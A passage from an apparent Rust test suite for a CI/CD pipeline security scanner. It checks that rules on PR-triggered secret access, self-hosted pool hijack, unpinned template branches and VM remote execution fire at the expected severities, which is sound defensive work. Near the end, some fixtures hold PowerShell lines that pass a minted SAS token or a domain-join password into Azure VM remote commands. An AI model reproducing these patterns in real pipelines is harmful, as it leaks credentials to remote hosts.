7491        let findings = self_mutating_pipeline(&g);
7492        assert_eq!(findings.len(), 1);
7493        assert_eq!(findings[0].severity, Severity::High);
7494    }
7495
7496    #[test]
7497    fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
7498        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7499        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7500        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7501        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7502        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7503
7504        let findings = trigger_context_mismatch(&g);
7505        assert_eq!(findings.len(), 1);
7506        assert_eq!(findings[0].severity, Severity::High);
7507        assert_eq!(
7508            findings[0].category,
7509            FindingCategory::TriggerContextMismatch
7510        );
7511    }
7512
7513    #[test]
7514    fn cross_workflow_authority_chain_third_party_is_high() {
7515        let mut g = AuthorityGraph::new(source("ci.yml"));
7516        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7517        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7518        // ThirdParty target (SHA-pinned external workflow)
7519        let external = g.add_node(
7520            NodeKind::Image,
7521            "org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
7522            TrustZone::ThirdParty,
7523        );
7524        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7525        g.add_edge(step, external, EdgeKind::DelegatesTo);
7526
7527        let findings = cross_workflow_authority_chain(&g);
7528        assert_eq!(findings.len(), 1);
7529        assert_eq!(
7530            findings[0].severity,
7531            Severity::High,
7532            "ThirdParty delegation target should be High (Critical reserved for Untrusted)"
7533        );
7534        assert_eq!(
7535            findings[0].category,
7536            FindingCategory::CrossWorkflowAuthorityChain
7537        );
7538    }
7539
7540    #[test]
7541    fn self_mutating_pipeline_first_party_no_authority_is_medium() {
7542        let mut g = AuthorityGraph::new(source("ci.yml"));
7543        let mut meta = std::collections::HashMap::new();
7544        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7545        // FirstParty step writes the gate but holds no secret/identity access.
7546        g.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, meta);
7547
7548        let findings = self_mutating_pipeline(&g);
7549        assert_eq!(findings.len(), 1);
7550        assert_eq!(findings[0].severity, Severity::Medium);
7551        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7552    }
7553
7554    #[test]
7555    fn authority_cycle_3node_cycle_includes_all_members() {
7556        // A → B → C → A should produce one finding whose nodes_involved
7557        // contains all three node IDs, not just the back-edge endpoints.
7558        let mut g = AuthorityGraph::new(source("test.yml"));
7559        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7560        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7561        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7562        g.add_edge(a, b, EdgeKind::DelegatesTo);
7563        g.add_edge(b, c, EdgeKind::DelegatesTo);
7564        g.add_edge(c, a, EdgeKind::DelegatesTo);
7565
7566        let findings = authority_cycle(&g);
7567        assert_eq!(findings.len(), 1);
7568        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7569        assert!(
7570            findings[0].nodes_involved.contains(&a),
7571            "A must be in nodes_involved"
7572        );
7573        assert!(
7574            findings[0].nodes_involved.contains(&b),
7575            "B must be in nodes_involved — middle of A→B→C→A cycle"
7576        );
7577        assert!(
7578            findings[0].nodes_involved.contains(&c),
7579            "C must be in nodes_involved"
7580        );
7581    }
7582
7583    #[test]
7584    fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
7585        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7586        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7587        let mut secret_meta = std::collections::HashMap::new();
7588        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7589        let secret = g.add_node_with_metadata(
7590            NodeKind::Secret,
7591            "prod-deploy-secrets",
7592            TrustZone::FirstParty,
7593            secret_meta,
7594        );
7595        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7596        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7597
7598        let findings = variable_group_in_pr_job(&g);
7599        assert_eq!(findings.len(), 1);
7600        assert_eq!(findings[0].severity, Severity::Critical);
7601        assert_eq!(findings[0].category, FindingCategory::VariableGroupInPrJob);
7602        assert!(findings[0].message.contains("prod-deploy-secrets"));
7603    }
7604
7605    #[test]
7606    fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
7607        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7608        // No trigger metadata — should not fire
7609        let mut secret_meta = std::collections::HashMap::new();
7610        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7611        let secret = g.add_node_with_metadata(
7612            NodeKind::Secret,
7613            "prod-deploy-secrets",
7614            TrustZone::FirstParty,
7615            secret_meta,
7616        );
7617        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7618        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7619
7620        let findings = variable_group_in_pr_job(&g);
7621        assert!(
7622            findings.is_empty(),
7623            "no PR trigger → variable_group_in_pr_job must not fire"
7624        );
7625    }
7626
7627    #[test]
7628    fn variable_group_in_pr_job_no_fire_when_pr_none() {
7629        // Regression for Bug 1: pr: none in ADO means no PR trigger — the parser
7630        // must not set META_TRIGGER, so variable_group_in_pr_job must not fire.
7631        // This test validates at the rule level: no META_TRIGGER → no firing.
7632        let mut g = AuthorityGraph::new(source("weekly-report.yml"));
7633        // No META_TRIGGER inserted — mirrors what the parser produces for pr: none.
7634        let mut secret_meta = std::collections::HashMap::new();
7635        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7636        let secret = g.add_node_with_metadata(
7637            NodeKind::Secret,
7638            "ado-report-secrets",
7639            TrustZone::FirstParty,
7640            secret_meta,
7641        );
7642        let step = g.add_node(NodeKind::Step, "report-step", TrustZone::FirstParty);
7643        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7644
7645        let findings = variable_group_in_pr_job(&g);
7646        assert!(
7647            findings.is_empty(),
7648            "pr: none (no META_TRIGGER) → variable_group_in_pr_job must not fire; got: {findings:#?}"
7649        );
7650    }
7651
7652    #[test]
7653    fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
7654        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7655        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7656
7657        let mut pool_meta = std::collections::HashMap::new();
7658        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7659        g.add_node_with_metadata(
7660            NodeKind::Image,
7661            "self-hosted-pool",
7662            TrustZone::FirstParty,
7663            pool_meta,
7664        );
7665
7666        let mut step_meta = std::collections::HashMap::new();
7667        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7668        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7669
7670        let findings = self_hosted_pool_pr_hijack(&g);
7671        assert_eq!(findings.len(), 1);
7672        assert_eq!(findings[0].severity, Severity::Critical);
7673        assert_eq!(
7674            findings[0].category,
7675            FindingCategory::SelfHostedPoolPrHijack
7676        );
7677        assert!(findings[0].message.contains("self-hosted"));
7678    }
7679
7680    #[test]
7681    fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
7682        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7683        // No trigger metadata
7684
7685        let mut pool_meta = std::collections::HashMap::new();
7686        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7687        g.add_node_with_metadata(
7688            NodeKind::Image,
7689            "self-hosted-pool",
7690            TrustZone::FirstParty,
7691            pool_meta,
7692        );
7693
7694        let mut step_meta = std::collections::HashMap::new();
7695        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7696        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7697
7698        let findings = self_hosted_pool_pr_hijack(&g);
7699        assert!(
7700            findings.is_empty(),
7701            "no PR trigger → self_hosted_pool_pr_hijack must not fire"
7702        );
7703    }
7704
7705    #[test]
7706    fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
7707        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7708        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7709
7710        let mut sc_meta = std::collections::HashMap::new();
7711        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7712        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7713        // No META_OIDC → treated as not OIDC-federated
7714        let sc = g.add_node_with_metadata(
7715            NodeKind::Identity,
7716            "prod-azure-sc",
7717            TrustZone::FirstParty,
7718            sc_meta,
7719        );
7720        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7721        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7722
7723        let findings = service_connection_scope_mismatch(&g);
7724        assert_eq!(findings.len(), 1);
7725        assert_eq!(findings[0].severity, Severity::High);
7726        assert_eq!(
7727            findings[0].category,
7728            FindingCategory::ServiceConnectionScopeMismatch
7729        );
7730        assert!(findings[0].message.contains("prod-azure-sc"));
7731    }
7732
7733    #[test]
7734    fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
7735        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7736        // No trigger metadata
7737        let mut sc_meta = std::collections::HashMap::new();
7738        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7739        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7740        let sc = g.add_node_with_metadata(
7741            NodeKind::Identity,
7742            "prod-azure-sc",
7743            TrustZone::FirstParty,
7744            sc_meta,
7745        );
7746        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7747        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7748
7749        let findings = service_connection_scope_mismatch(&g);
7750        assert!(
7751            findings.is_empty(),
7752            "no PR trigger → service_connection_scope_mismatch must not fire"
7753        );
7754    }
7755
7756    #[test]
7757    fn checkout_self_pr_exposure_fires_on_pr_trigger() {
7758        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7759        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7760        let mut step_meta = std::collections::HashMap::new();
7761        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7762        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7763
7764        let findings = checkout_self_pr_exposure(&g);
7765        assert_eq!(findings.len(), 1);
7766        assert_eq!(
7767            findings[0].category,
7768            FindingCategory::CheckoutSelfPrExposure
7769        );
7770        assert_eq!(findings[0].severity, Severity::High);
7771    }
7772
7773    #[test]
7774    fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
7775        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7776        // No META_TRIGGER set
7777        let mut step_meta = std::collections::HashMap::new();
7778        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7779        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7780
7781        let findings = checkout_self_pr_exposure(&g);
7782        assert!(
7783            findings.is_empty(),
7784            "no PR trigger → checkout_self_pr_exposure must not fire"
7785        );
7786    }
7787
7788    #[test]
7789    fn variable_group_in_pr_job_uses_cellos_remediation() {
7790        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7791        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7792
7793        let mut secret_meta = std::collections::HashMap::new();
7794        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7795        let secret = g.add_node_with_metadata(
7796            NodeKind::Secret,
7797            "prod-secret",
7798            TrustZone::FirstParty,
7799            secret_meta,
7800        );
7801        let step = g.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
7802        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7803
7804        let findings = variable_group_in_pr_job(&g);
7805        assert!(!findings.is_empty());
7806        assert!(
7807            matches!(
7808                findings[0].recommendation,
7809                Recommendation::CellosRemediation { .. }
7810            ),
7811            "variable_group_in_pr_job must recommend CellosRemediation"
7812        );
7813    }
7814
7815    #[test]
7816    fn service_connection_scope_mismatch_uses_cellos_remediation() {
7817        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7818        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7819
7820        let mut id_meta = std::collections::HashMap::new();
7821        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7822        id_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7823        // No META_OIDC → treated as not OIDC-federated
7824        let identity = g.add_node_with_metadata(
7825            NodeKind::Identity,
7826            "sub-conn",
7827            TrustZone::FirstParty,
7828            id_meta,
7829        );
7830        let step = g.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
7831        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7832
7833        let findings = service_connection_scope_mismatch(&g);
7834        assert!(!findings.is_empty());
7835        assert!(
7836            matches!(
7837                findings[0].recommendation,
7838                Recommendation::CellosRemediation { .. }
7839            ),
7840            "service_connection_scope_mismatch must recommend CellosRemediation"
7841        );
7842    }
7843
7844    /// Build a propagation graph with an optional approval-gated middle step:
7845    ///   Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
7846    /// When `gated` is true the middle step carries META_ENV_APPROVAL.
7847    fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
7848        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7849
7850        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7851        let mut middle_meta = std::collections::HashMap::new();
7852        if gated {
7853            middle_meta.insert(META_ENV_APPROVAL.into(), "true".into());
7854        }
7855        let middle = g.add_node_with_metadata(
7856            NodeKind::Step,
7857            "deploy-prod",
7858            TrustZone::FirstParty,
7859            middle_meta,
7860        );
7861        let artifact = g.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
7862        let third = g.add_node(
7863            NodeKind::Step,
7864            "third-party/uploader",
7865            TrustZone::ThirdParty,
7866        );
7867
7868        g.add_edge(middle, secret, EdgeKind::HasAccessTo);
7869        g.add_edge(middle, artifact, EdgeKind::Produces);
7870        g.add_edge(artifact, third, EdgeKind::Consumes);
7871
7872        g
7873    }
7874
7875    #[test]
7876    fn env_approval_gate_reduces_propagation_severity() {
7877        // Baseline: no gate → Critical (third-party sink, not SHA-pinned)
7878        let baseline = authority_propagation(&build_env_approval_graph(false), 4);
7879        let baseline_finding = baseline
7880            .iter()
7881            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7882            .expect("baseline must produce an AuthorityPropagation finding");
7883        assert_eq!(baseline_finding.severity, Severity::Critical);
7884        assert!(!baseline_finding
7885            .message
7886            .contains("environment approval gate"));
7887
7888        // Gated: same shape, middle step tagged → severity drops one step to High
7889        let gated = authority_propagation(&build_env_approval_graph(true), 4);
7890        let gated_finding = gated
7891            .iter()
7892            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7893            .expect("gated must produce an AuthorityPropagation finding");
7894        assert_eq!(
7895            gated_finding.severity,
7896            Severity::High,
7897            "Critical must downgrade to High when path crosses an env-approval gate"
7898        );
7899        assert!(
7900            gated_finding
7901                .message
7902                .contains("(mitigated: environment approval gate)"),
7903            "gated finding must annotate the mitigation in its message"
7904        );
7905    }
7906
7907    #[test]
7908    fn downgrade_one_step_table() {
7909        assert_eq!(downgrade_one_step(Severity::Critical), Severity::High);
7910        assert_eq!(downgrade_one_step(Severity::High), Severity::Medium);
7911        assert_eq!(downgrade_one_step(Severity::Medium), Severity::Low);
7912        assert_eq!(downgrade_one_step(Severity::Low), Severity::Low);
7913        assert_eq!(downgrade_one_step(Severity::Info), Severity::Info);
7914    }
7915
7916    // ── template_extends_unpinned_branch ──────────────────────
7917
7918    /// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
7919    /// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
7920    fn graph_with_repo(
7921        alias: &str,
7922        repo_type: &str,
7923        name: &str,
7924        git_ref: Option<&str>,
7925        used: bool,
7926    ) -> AuthorityGraph {
7927        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7928        let mut obj = serde_json::Map::new();
7929        obj.insert("alias".into(), serde_json::Value::String(alias.into()));
7930        obj.insert(
7931            "repo_type".into(),
7932            serde_json::Value::String(repo_type.into()),
7933        );
7934        obj.insert("name".into(), serde_json::Value::String(name.into()));
7935        if let Some(r) = git_ref {
7936            obj.insert("ref".into(), serde_json::Value::String(r.into()));
7937        }
7938        obj.insert("used".into(), serde_json::Value::Bool(used));
7939        let arr = serde_json::Value::Array(vec![serde_json::Value::Object(obj)]);
7940        g.metadata.insert(
7941            META_REPOSITORIES.into(),
7942            serde_json::to_string(&arr).unwrap(),
7943        );
7944        g
7945    }
7946
7947    // ── vm_remote_exec_via_pipeline_secret ──────────────
7948
7949    /// Helper: build a graph with one Step that has the given inline script
7950    /// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
7951    fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
7952        let mut g = AuthorityGraph::new(source("ado.yml"));
7953        let mut meta = std::collections::HashMap::new();
7954        meta.insert(META_SCRIPT_BODY.into(), body.into());
7955        let step_id =
7956            g.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, meta);
7957        if let Some(name) = secret_name {
7958            let sec = g.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
7959            g.add_edge(step_id, sec, EdgeKind::HasAccessTo);
7960        }
7961        g
7962    }
7963
7964    // ── secret_to_inline_script_env_export ────────────────────
7965
7966    /// Build a graph with one Step that has access to `secret_name` and
7967    /// stamps `script` as the META_SCRIPT_BODY.
7968    fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
7969        let mut g = AuthorityGraph::new(source("ado.yml"));
7970        let secret = g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
7971        let mut meta = std::collections::HashMap::new();
7972        meta.insert(META_SCRIPT_BODY.into(), script.into());
7973        let step = g.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, meta);
7974        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7975        g
7976    }
7977
7978    #[test]
7979    fn template_extends_unpinned_branch_fires_on_missing_ref() {
7980        let g = graph_with_repo(
7981            "template-library",
7982            "git",
7983            "Template Library/Library",
7984            None,
7985            true,
7986        );
7987        let findings = template_extends_unpinned_branch(&g);
7988        assert_eq!(findings.len(), 1);
7989        assert_eq!(
7990            findings[0].category,
7991            FindingCategory::TemplateExtendsUnpinnedBranch
7992        );
7993        assert_eq!(findings[0].severity, Severity::High);
7994        assert!(findings[0].message.contains("default branch"));
7995    }
7996
7997    #[test]
7998    fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
7999        let g = graph_with_repo(
8000            "templates",
8001            "git",
8002            "org/templates",
8003            Some("refs/heads/main"),
8004            true,
8005        );
8006        let findings = template_extends_unpinned_branch(&g);
8007        assert_eq!(findings.len(), 1);
8008        assert!(findings[0].message.contains("mutable branch 'main'"));
8009    }
8010
8011    #[test]
8012    fn template_extends_unpinned_branch_skips_tag_pinned() {
8013        let g = graph_with_repo(
8014            "templates",
8015            "github",
8016            "org/templates",
8017            Some("refs/tags/v1.0.0"),
8018            true,
8019        );
8020        let findings = template_extends_unpinned_branch(&g);
8021        assert!(
8022            findings.is_empty(),
8023            "refs/tags/v1.0.0 must be treated as pinned"
8024        );
8025    }
8026
8027    #[test]
8028    fn template_extends_unpinned_branch_skips_sha_pinned() {
8029        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8030        assert_eq!(sha.len(), 40);
8031        let g = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
8032        let findings = template_extends_unpinned_branch(&g);
8033        assert!(
8034            findings.is_empty(),
8035            "40-char hex SHA must be treated as pinned"
8036        );
8037    }
8038
8039    #[test]
8040    fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
8041        // Spec edge: "repo declared but not referenced anywhere → does not fire
8042        // (no consumer = no risk)". Applies when the declaration carries no
8043        // explicit `ref:` field — the entry is purely vestigial in that case.
8044        let g = graph_with_repo(
8045            "templates",
8046            "git",
8047            "org/templates",
8048            None,  // no explicit ref
8049            false, // and no consumer
8050        );
8051        let findings = template_extends_unpinned_branch(&g);
8052        assert!(
8053            findings.is_empty(),
8054            "repo declared with no ref and no consumer must not fire"
8055        );
8056    }
8057
8058    #[test]
8059    fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
8060        // An explicit `ref: refs/heads/<branch>` signals intent to consume —
8061        // the consumer is typically inside an included template file outside
8062        // the per-file scan boundary (mirrors the msigeurope corpus shape).
8063        let g = graph_with_repo(
8064            "adf_publish",
8065            "git",
8066            "org/finance-reporting",
8067            Some("refs/heads/adf_publish"),
8068            false, // no in-file consumer
8069        );
8070        let findings = template_extends_unpinned_branch(&g);
8071        assert_eq!(findings.len(), 1);
8072        assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
8073    }
8074
8075    #[test]
8076    fn template_extends_unpinned_branch_skips_when_metadata_absent() {
8077        let g = AuthorityGraph::new(source("ci.yml"));
8078        assert!(template_extends_unpinned_branch(&g).is_empty());
8079    }
8080
8081    #[test]
8082    fn template_extends_unpinned_branch_handles_bare_branch_name() {
8083        // `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
8084        let g = graph_with_repo(
8085            "template-library",
8086            "git",
8087            "Template Library/Library",
8088            Some("main"),
8089            true,
8090        );
8091        let findings = template_extends_unpinned_branch(&g);
8092        assert_eq!(findings.len(), 1);
8093        assert!(findings[0].message.contains("mutable branch 'main'"));
8094    }
8095
8096    // ── template_repo_ref_is_feature_branch ───────────────────
8097
8098    #[test]
8099    fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
8100        // Mirrors the corpus shape: `ref: feature/maps-network` (no
8101        // `refs/heads/` prefix) on the Template Library checkout.
8102        let g = graph_with_repo(
8103            "templateLibRepo",
8104            "git",
8105            "Template Library/Template Library",
8106            Some("feature/maps-network"),
8107            true,
8108        );
8109        let findings = template_repo_ref_is_feature_branch(&g);
8110        assert_eq!(findings.len(), 1);
8111        assert_eq!(
8112            findings[0].category,
8113            FindingCategory::TemplateRepoRefIsFeatureBranch
8114        );
8115        assert_eq!(findings[0].severity, Severity::High);
8116        assert!(findings[0].message.contains("feature/maps-network"));
8117        assert!(findings[0].message.contains("feature-class"));
8118    }
8119
8120    #[test]
8121    fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
8122        // Same attack via the fully-qualified `refs/heads/feature/...` form.
8123        let g = graph_with_repo(
8124            "templates",
8125            "git",
8126            "org/templates",
8127            Some("refs/heads/feature/wip"),
8128            true,
8129        );
8130        let findings = template_repo_ref_is_feature_branch(&g);
8131        assert_eq!(findings.len(), 1);
8132        assert!(findings[0].message.contains("feature/wip"));
8133    }
8134
8135    #[test]
8136    fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
8137        // `develop` is not in the trunk set — it's a feature-class branch.
8138        let g = graph_with_repo(
8139            "templates",
8140            "git",
8141            "org/templates",
8142            Some("refs/heads/develop"),
8143            true,
8144        );
8145        let findings = template_repo_ref_is_feature_branch(&g);
8146        assert_eq!(findings.len(), 1);
8147    }
8148
8149    #[test]
8150    fn template_repo_ref_is_feature_branch_skips_main_branch() {
8151        // `template_extends_unpinned_branch` still fires on this — but the
8152        // feature-branch refinement does not, because main is the trunk.
8153        let g = graph_with_repo(
8154            "templates",
8155            "git",
8156            "org/templates",
8157            Some("refs/heads/main"),
8158            true,
8159        );
8160        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8161        // Sanity: the parent rule still fires on the same input.
8162        assert_eq!(template_extends_unpinned_branch(&g).len(), 1);
8163    }
8164
8165    #[test]
8166    fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
8167        for ref_value in [
8168            "master",
8169            "refs/heads/master",
8170            "release/v1.4",
8171            "refs/heads/release/2026-q2",
8172            "releases/2026-04",
8173            "hotfix/CVE-2026-0001",
8174            "refs/heads/hotfix/CVE-2026-0002",
8175        ] {
8176            let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
8177            assert!(
8178                template_repo_ref_is_feature_branch(&g).is_empty(),
8179                "ref {ref_value:?} must not fire as feature-class"
8180            );
8181        }
8182    }
8183
8184    #[test]
8185    fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
8186        // SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
8187        // rule must not fire on any of them, regardless of the alias name.
8188        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8189        for ref_value in [
8190            sha.to_string(),
8191            "refs/tags/v1.4.2".to_string(),
8192            format!("refs/heads/{sha}"),
8193        ] {
8194            let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
8195            assert!(
8196                template_repo_ref_is_feature_branch(&g).is_empty(),
8197                "pinned ref {ref_value:?} must not fire"
8198            );
8199        }
8200    }
8201
8202    #[test]
8203    fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
8204        // The "no ref:" (default-branch) case is left to
8205        // `template_extends_unpinned_branch`. The feature-branch rule only
8206        // fires on explicit feature-class refs.
8207        let g = graph_with_repo("templates", "git", "org/templates", None, true);
8208        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8209    }
8210
8211    #[test]
8212    fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
8213        // Both rules should fire together on the corpus shape — the parent
8214        // says "not pinned", the refinement says "and it's a feature branch".
8215        let g = graph_with_repo(
8216            "templateLibRepo",
8217            "git",
8218            "Template Library/Template Library",
8219            Some("feature/maps-network"),
8220            true,
8221        );
8222        let parent = template_extends_unpinned_branch(&g);
8223        let refinement = template_repo_ref_is_feature_branch(&g);
8224        assert_eq!(parent.len(), 1, "parent rule must still fire");
8225        assert_eq!(refinement.len(), 1, "refinement must fire alongside");
8226        assert_ne!(parent[0].category, refinement[0].category);
8227    }
8228
8229    #[test]
8230    fn is_feature_class_branch_classification() {
8231        // Trunk-class — must return false.
8232        for b in [
8233            "main",
8234            "MAIN",
8235            "master",
8236            "refs/heads/main",
8237            "release/v1",
8238            "release/",
8239            "release",
8240            "releases/2026",
8241            "hotfix/x",
8242            "hotfix",
8243            "hotfixes/y",
8244            "  refs/heads/main  ",
8245        ] {
8246            assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
8247        }
8248        // Feature-class — must return true.
8249        for b in [
8250            "feature/foo",
8251            "topic/bar",
8252            "dev/wip",
8253            "wip/x",
8254            "develop",
8255            "users/alice/spike",
8256            "personal-branch",
8257            "refs/heads/feature/x",
8258            "main-staging", // not exact main, prefix-only — feature-class
8259        ] {
8260            assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
8261        }
8262        // Empty / whitespace.
8263        assert!(!is_feature_class_branch(""));
8264        assert!(!is_feature_class_branch("   "));
8265    }
8266
8267    #[test]
8268    fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
8269        // ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
8270        // The trailing segment is what determines mutability.
8271        let sha = "0123456789abcdef0123456789abcdef01234567";
8272        let g = graph_with_repo(
8273            "templates",
8274            "git",
8275            "org/templates",
8276            Some(&format!("refs/heads/{sha}")),
8277            true,
8278        );
8279        let findings = template_extends_unpinned_branch(&g);
8280        assert!(findings.is_empty());
8281    }
8282
8283    // ── vm_remote_exec_via_pipeline_secret ──────────────
8284
8285    #[test]
8286    fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
8287        let body = r#"
8288            $sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8289            Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
8290                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8291                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
8292        "#;
8293        let g = graph_with_script_step(body, None);
8294        let findings = vm_remote_exec_via_pipeline_secret(&g);
8295        assert_eq!(findings.len(), 1, "should fire once");
8296        assert_eq!(
8297            findings[0].category,
8298            FindingCategory::VmRemoteExecViaPipelineSecret
8299        );
8300        assert_eq!(findings[0].severity, Severity::High);
8301    }
8302
8303    #[test]
8304    fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
8305        let body = r#"
8306            Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
8307                -CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
8308        "#;
8309        let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
8310        let findings = vm_remote_exec_via_pipeline_secret(&g);
8311        assert_eq!(findings.len(), 1);
8312        assert!(findings[0]
8313            .message
8314            .contains("interpolating a pipeline secret"));
8315    }
8316
8317    #[test]
8318    fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
8319        // Has a SAS mint, but no VM remote-exec primitive — should not fire.
8320        let body = r#"
8321            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8322            Write-Host "sas length is $($sas.Length)"
8323        "#;
8324        let g = graph_with_script_step(body, None);
8325        let findings = vm_remote_exec_via_pipeline_secret(&g);
